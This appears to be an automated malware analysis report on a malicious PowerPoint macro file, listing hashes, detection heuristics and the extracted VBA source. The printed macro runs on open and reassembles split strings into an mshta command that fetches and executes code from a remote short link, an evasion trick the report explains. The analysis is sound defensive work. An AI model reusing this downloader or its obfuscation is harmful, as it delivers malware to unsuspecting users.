Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b5e4e2043c621cb8…

MALICIOUS

Office (OOXML)

12.0 KB First seen: 2021-04-29
MD5: 2dea0dc0c4e886f20d4cf71069e3b604 SHA-1: 97f0a48b140a2c653d4130b1e9c3e46bd858294d SHA-256: b5e4e2043c621cb8168ddbbd7d06373d2214ec9a0944706e26e4fc4b2d53f3ba
152 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell _
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Shell _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • VBA project signed with a self-signed certificate info OLE_VBA_SIGNATURE_SELF_SIGNED
    The VBA project is signed, but the signing certificate is self-signed (issuer equals subject) — no certificate authority vouches for the signer. Self-signed VBA signing is the common trick to make a macro project appear signed/trusted without a real publisher identity.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.google.com In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 796 bytes
SHA-256: 21aa9c6fbe4e2c3e5804f46768d9c62e2db42f235f838199ce4bbf3ad3d199bf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module"
Sub Auto_Open()
Dim calc As New polar

p_ = calc _
.computer + calc _
.computer2 + calc _
.computer3



Shell _
p_



End Sub

Attribute VB_Name = "polar"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Property Get computer() As String
computer = "m" + "s" + "h" + "t" + "a h"
End Property
Public Property Get computer2() As String
computer2 = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w"
End Property
Public Property Get computer3() As String
computer3 = ".j.mp/ddsobpechateesesjdw"
End Property
vbaProject_00.bin🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-project OOXML VBA project: ppt/vbaProject.bin 22528 bytes
SHA-256: f998f825c1f46fd9dae684a1077408d41109d1875ee06edcd0c1297611cc50fb

Open this report in the interactive analyzer, or submit your own file for analysis.